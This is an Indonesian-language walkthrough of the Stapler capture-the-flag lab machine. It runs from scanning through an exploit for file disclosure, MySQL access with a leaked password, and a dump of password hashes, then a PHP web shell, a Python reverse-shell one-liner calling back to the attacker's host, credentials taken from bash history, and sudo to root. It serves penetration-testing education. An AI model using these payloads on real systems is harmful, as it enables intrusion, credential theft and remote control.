+ Hostname '192.168.0.61' does not match certificate's names: Red.Initech
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 8071 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time:           2023-01-23 01:59:01 (GMT-5) (224 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


Yang menarik, kita memperoleh 4 directory: /phpmyadin/, /blogblog/, /admin112233/, dan tentunya /robots.txt.

Akses Web

Coba akses, 

https://192.168.0.61:12380/robots.txt

Tampak isinya, 

User-agent: *
Disallow: /admin112233/
Disallow: /blogblog/

Mari kita coba 

https://192.168.0.61:12380/admin112233/

Akan mengeluarkan "humor" 

This could of been a BeEF-XSS hook ;)

Mari kita coba 

https://192.168.0.61:12380/blogblog/

Tampak berisi blog, tidak ada yang terlalu menarik kecuali ada beberapa nama. Dan yang menarik ada login page.

WPScan

Scan menggunakan, 

wpscan --url https://192.168.0.61:12380/blogblog/ -e u --disable-tls-checks
wpscan --url https://192.168.0.61:12380/blogblog/ -e ap --disable-tls-checks

Hasilnya, 

_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|  

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: https://192.168.0.61:12380/blogblog/ [192.168.0.61]
[+] Started: Mon Jan 23 03:19:59 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Apache/2.4.18 (Ubuntu)
 |  - Dave: Soemthing doesn't look right here
 | Found By: Headers (Passive Detection)
 | Confidence: 100% 

[+] XML-RPC seems to be enabled: https://192.168.0.61:12380/blogblog/xmlrpc.php
 | Found By: Headers (Passive Detection)
 | Confidence: 100%
 | Confirmed By:
 |  - Link Tag (Passive Detection), 30% confidence
 |  - Direct Access (Aggressive Detection), 100% confidence
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/ 

[+] WordPress readme found: https://192.168.0.61:12380/blogblog/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100% 

[+] Registration is enabled: https://192.168.0.61:12380/blogblog/wp-login.php? action=register 
 | Found By: Di rect Access (Aggressive Detection)
 | Confidence:  100% 

[+] Upload directory has listing enabled: https://192.168.0.61:12380/blogblog/wp- content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: https://192.168.0.61:12380/blogblog/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.2.1 identified (Insecure, released on 2015-04-27).
 | Found By: Rss Generator (Passive Detection)
 |  - https://192.168.0.61:12380/blogblog/?feed=rss2, <generator>http://wordpress.org/?v=4.2.1</generator>
 |  - https://192.168.0.61:12380/blogblog/?feed=comments-rss2, <generator>http://wordpress.org/?v=4.2.1</generator>

[+] WordPress theme in use: bhost
 | Location: https://192.168.0.61:12380/blogblog/wp-content/themes/bhost/
 | Last Updated: 2022-10-30T00:00:00.000Z
 | Readme: https://192.168.0.61:12380/blogblog/wp-content/themes/bhost/readme.txt
 | [!] The version is out of date, the latest version is 1.6
 | Style URL: https://192.168.0.61:12380/blogblog/wp-content/themes/bhost/style.css?ver=4.2.1
 | Style Name: BHost
 | Description: Bhost is a nice , clean , beautifull, Responsive and modern design free WordPress Theme. This theme ...
 | Author: Masum Billah
 | Author URI: http://getmasum.net/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.2.9 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - https://192.168.0.61:12380/blogblog/wp-content/themes/bhost/style.css?ver=4.2.1, Match: 'Version: 1.2.9'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 
<====================================================================================================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] John Smith
 | Found By: Author Posts - Display Name (Passive Detection)
 | Confirmed By: Rss Generator (Passive Detection)

[+] john
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] garry
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] barry
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection) 

[+] elly
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] peter
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] heather
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] harry
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] scott
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] kathy
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection) 

[+] tim
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Mon Jan 23 03:20:02 2023
[+] Requests Done: 23
[+] Cached Requests: 55
[+] Data Sent: 7.361 KB
[+] Data Received: 49.097 KB
[+] Memory used: 193.543 MB
[+] Elapsed time: 00:00:03


Hasil -e ap 

_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_| 

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: https://192.168.0.61:12380/blogblog/ [192.168.0.61]
[+] Started: Mon Jan 23 03:23:24 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Apache/2.4.18 (Ubuntu)
 |  - Dave: Soemthing doesn't look right here
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: https://192.168.0.61:12380/blogblog/xmlrpc.php
 | Found By: Headers (Passive Detection)
 | Confidence: 100%
 | Confirmed By:
 |  - Link Tag (Passive Detection), 30% confidence
 |  - Direct Access (Aggressive Detection), 100% confidence
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: https://192.168.0.61:12380/blogblog/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%  

[+] Registration is enabled: https://192.168.0.61:12380/blogblog/wp-login.php? action=register 
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: https://192.168.0.61:12380/blogblog/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: https://192.168.0.61:12380/blogblog/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.2.1 identified (Insecure, released on 2015-04-27).
 | Found By: Rss Generator (Passive Detection)
 |  - https://192.168.0.61:12380/blogblog/?feed=rss2, <generator>http://wordpress.org/?v=4.2.1</generator>
 |  - https://192.168.0.61:12380/blogblog/?feed=comments-rss2, <generator>http://wordpress.org/?v=4.2.1</generator>

[+] WordPress theme in use: bhost
 | Location: https://192.168.0.61:12380/blogblog/wp-content/themes/bhost/
 | Last Updated: 2022-10-30T00:00:00.000Z
 | Readme: https://192.168.0.61:12380/blogblog/wp-content/themes/bhost/readme.txt
 | [!] The version is out of date, the latest version is 1.6
 | Style URL: https://192.168.0.61:12380/blogblog/wp-content/themes/bhost/style.css?ver=4.2.1
 | Style Name: BHost
 | Description: Bhost is a nice , clean , beautifull, Responsive and modern design free WordPress Theme. This theme ...
 | Author: Masum Billah
 | Author URI: http://getmasum.net/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.2.9 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - https://192.168.0.61:12380/blogblog/wp-content/themes/bhost/style.css?ver=4.2.1, 
Match: 'Version: 1.2.9'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Mon Jan 23 03:23:29 2023
[+] Requests Done: 2
[+] Cached Requests: 34
[+] Data Sent: 660 B
[+] Data Received: 1.093 KB
[+] Memory used: 239.617 MB
[+] Elapsed time: 00:00:05

Keren!

LFI Exploit

Download Exploit dari https://www.exploit-db.com/exploits/39646 Edit file 

vi /home/kali/Downloads/39646.py

Tambahkan, 

import ssl
ssl._create_default_https_context = ssl._create_unverified_context
url = "https://192.168.0.61:12380/blogblog/"

Jalankan 

cd /home/kali/Downloads/
python2 39646.py

Setelah berhasil jalan, coba masuk ke 

https://192.168.0.61:12380/blogblog/wp-content/uploads/

Akan tampak, 

Index of /blogblog/wp-content/uploads
[ICO]	        Name	        Last modified	Size	Description
[PARENTDIR]	Parent Directory	 	-	 
[IMG]	        1402053515.jpeg	2023-01-23 16:11	3.0K

terlihat ada file 1402053515.jpeg Klik kanan di file tersebut, simpan di komputer kita. 

cd /home/kali/Downloads/
wget --no-check-certificate https://192.168.0.61:12380/blogblog/wp-content/uploads/1402053515.jpeg

Rename jpeg :) ... 

mv 1402053515.jpeg 1402053515
more 1402053515

Hasilnya, 

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'plbkac');

/** MySQL hostname */
define('DB_HOST', 'localhost');

Keren! kita dapat password MySQL ..

Akses MySQL

Akses MySQL menggunakan, 

mysql -u root -p -h 192.168.0.61 -pplbkac

Hasilnya, 

Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 119
Server version: 5.7.12-0ubuntu1 (Ubuntu)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]>

Lihat database yang ada, 

MySQL [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| loot               |
| mysql              |
| performance_schema |
| phpmyadmin         |
| proof              |
| sys                |
| wordpress          |
+--------------------+
8 rows in set (0.059 sec)

Pakai database wordpress, 

MySQL [(none)]> use wordpress
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MySQL [wordpress]>

Cek tables, 

MySQL [wordpress]> show tables;
+-----------------------+
| Tables_in_wordpress   |
+-----------------------+
| wp_commentmeta        |
| wp_comments           |
| wp_links              |
| wp_options            |
| wp_postmeta           |
| wp_posts              |
| wp_term_relationships |
| wp_term_taxonomy      |
| wp_terms              |
| wp_usermeta           |
| wp_users              |
+-----------------------+
11 rows in set (0.001 sec)

Cek struktur data wp_users, 

MySQL [wordpress]> describe wp_users;
+---------------------+---------------------+------+-----+---------------------+----------------+
| Field               | Type                | Null | Key | Default             | Extra          
|
+---------------------+---------------------+------+-----+---------------------+----------------+
| ID                  | bigint(20) unsigned | NO   | PRI | NULL                | auto_increment |
| user_login          | varchar(60)         | NO   | MUL |                     |                
|
| user_pass           | varchar(64)         | NO   |     |                     |                
|
| user_nicename       | varchar(50)         | NO   | MUL |                     |                
|
| user_email          | varchar(100)        | NO   |     |                     |                
|
| user_url            | varchar(100)        | NO   |     |                     |                
|
| user_registered     | datetime            | NO   |     | 0000-00-00 00:00:00 |                
|
| user_activation_key | varchar(60)         | NO   |     |                     |                
|
| user_status         | int(11)             | NO   |     | 0                   |                
|
| display_name        | varchar(250)        | NO   |     |                     |                
|
+---------------------+---------------------+------+-----+---------------------+----------------+
10 rows in set (0.002 sec)


Print username & password (di hash) 

MySQL [wordpress]> SELECT user_login, user_pass FROM wp_users;
+------------+------------------------------------+
| user_login | user_pass                          |
+------------+------------------------------------+
| John       | $P$B7889EMq/erHIuZapMB8GEizebcIy9. |
| Elly       | $P$BlumbJRRBit7y50Y17.UPJ/xEgv4my0 |
| Peter      | $P$BTzoYuAFiBA5ixX2njL0XcLzu67sGD0 |
| barry      | $P$BIp1ND3G70AnRAkRY41vpVypsTfZhk0 |
| heather    | $P$Bwd0VpK8hX4aN.rZ14WDdhEIGeJgf10 |
| garry      | $P$BzjfKAHd6N4cHKiugLX.4aLes8PxnZ1 |
| harry      | $P$BqV.SQ6OtKhVV7k7h1wqESkMh41buR0 |
| scott      | $P$BFmSPiDX1fChKRsytp1yp8Jo7RdHeI1 |
| kathy      | $P$BZlxAMnC6ON.PYaurLGrhfBi6TjtcA0 |
| tim        | $P$BXDR7dLIJczwfuExJdpQqRsNf.9ueN0 |
| ZOE        | $P$B.gMMKRP11QOdT5m1s9mstAUEDjagu1 |
| Dave       | $P$Bl7/V9Lqvu37jJT.6t4KWmY.v907Hy. |
| Simon      | $P$BLxdiNNRP008kOQ.jE44CjSK/7tEcz0 |
| Abby       | $P$ByZg5mTBpKiLZ5KxhhRe/uqR.48ofs. |
| Vicki      | $P$B85lqQ1Wwl2SqcPOuKDvxaSwodTY131 |
| Pam        | $P$BuLagypsIJdEuzMkf20XyS5bRm00dQ0 |
+------------+------------------------------------+
16 rows in set (0.001 sec)

Keren! kita bisa meng-crack password dengan md5 menggunakan hashcat atau menggunakan crack md5 online lewat web.

MySQL generate shell.php

Dari shell MySQL ketik, 

select "<?php echo shell_exec($_GET['cmd']);?>" into outfile "/var/www/https/blogblog/wp-content/uploads/shell.php";

Akses 

https://192.168.0.61:12380/blogblog/wp-content/uploads/

Akan tampak 

Index of /blogblog/wp-content/uploads
[ICO]	        Name	        Last modified	Size	Description
[PARENTDIR]	Parent Directory	 	-	 
[IMG]	        1402053515.jpeg	2023-01-23 16:11	3.0K	 
[   ]	        shell.php	2023-01-23 16:34	39	 
Apache/2.4.18 (Ubuntu) Server at 192.168.0.61 Port 12380

Terlihat ada shell.php. Sekarang akses URL berikut untuk mencek apakah shell.php bisa dipakai:) .. 

https://192.168.0.61:12380/blogblog/wp-content/uploads/shell.php?cmd=ifconfig

Hasilnya kira-kira 

enp0s3 Link encap:Ethernet HWaddr 08:00:27:8b:94:43 inet addr:192.168.0.61
Bcast:192.168.0.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX
packets:299263 errors:91 dropped:0 overruns:0 frame:0 TX packets:97438 errors:0 dropped:0
overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:27580727 (27.5 MB) TX
bytes:69269091 (69.2 MB) Interrupt:19 Base address:0xd000 lo Link encap:Local Loopback inet
addr:127.0.0.1 Mask:255.0.0.0 UP LOOPBACK RUNNING MTU:65536 Metric:1 RX packets:468
errors:0 dropped:0 overruns:0 frame:0 TX packets:468 errors:0 dropped:0 overruns:0
carrier:0 collisions:0 txqueuelen:1 RX bytes:50152 (50.1 KB) TX bytes:50152 (50.1 KB)

Inti-nya shell.php bisa di pakai :) ..


Akses Shell via Web

Cek IP address & catat kali linux 

ifconfig

Misalnya IP address kali linux 192.168.0.62 Siapkan di kali linux, 

nc -lvp 443

Lewat browser jalankan URL (asumsi IP address kali linux 

https://192.168.0.61:12380/blogblog/wp-content/uploads/shell.php?cmd=python%20-c%20'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.62",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Jika berjalan dengan baik akan tampak 

192.168.0.61: inverse host lookup failed: Unknown host
connect to [192.168.0.62] from (UNKNOWN) [192.168.0.61] 50340
/bin/sh: 0: can't access tty; job control turned off
$

Gunakan python untuk mengaktifkan bash 

$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@red:/var/www/https/blogblog/wp-content/uploads$ cd /
cd /
www-data@red:/$ ls
ls
bin   etc             lib         mnt   root  snap  tmp  vmlinuz.old
boot  home            lost+found  opt   run   srv   usr
dev   initrd.img.old  media       proc  sbin  sys   var
www-data@red:/$ cd home
cd home
www-data@red:/home$

Lihat bash_history menggunakan 

www-data@red:/home$ find -name ".bash_history" -exec cat {} \;
find -name ".bash_history" -exec cat {} \;
exit
exit
free
exit
exit
exit
exit
exit
exit
exit
exit
exit
exit
exit
top
ps aux
exit
exit
id
cat: ./peter/.bash_history: Permission denied
find: './peter/.cache': Permission denied
exit
id
whoami
ls -lah
pwd
ps aux
sshpass -p thisimypassword ssh JKanode@localhost
apt-get install sshpass
sshpass -p JZQuyIN5 peter@localhost
ps -ef
top
kill -9 3747
exit
exit
exit
exit
exit
exit
exit
exit
exit
whoami
exit
exit
exit
top
exit

Terlihat ada dua (2) username & password 

JKanode thisismypassword
peter   JZQuyIN5


SSH ke Server

ssh ke server 

ssh peter@192.168.0.61

-----------------------------------------------------------------
~          Barry, don't forget to put a message here           ~
-----------------------------------------------------------------
red%

Menjadi su 

red% sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for peter: 
Matching Defaults entries for peter on red:
    lecture=always, env_reset, mail_badpass, 
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User peter may run the following commands on red:
    (ALL : ALL) ALL
red%

Capture the Flag

red% sudo usermod -s /bin/bash peter
red% sudo -i
➜  ~ cd /root
➜  ~ ls
fix-wordpress.sh  flag.txt  issue  python.sh  wordpress.sql
➜  ~ cat flag.txt 
16:58, 23 January 2023 (WIB)16:58, 23 January 2023 (WIB)<(Congratulations)>16:58, 23 January 2023 (WIB)16:58, 23 January 2023 (WIB)
                          .--.
                          |'-----'|
                          |-.....-|
                          |       |
                          |       |
         _,._             |       |
    __.o`   o`"-.         |       |
 .-O o `"-.o   O )_,._    |       |
( o   O  o )--.-"`O   o"-.`'-----'`
 '--------'  (   o  O    o)  
              `----------`
b6b545dc11b7a270f4bad23432190c75162c4a2b

Referensi

Retrieved from "https://onnocenter.or.id/wiki/index.php?title=CTF_Stapler:_Walkthrough&oldid=67975"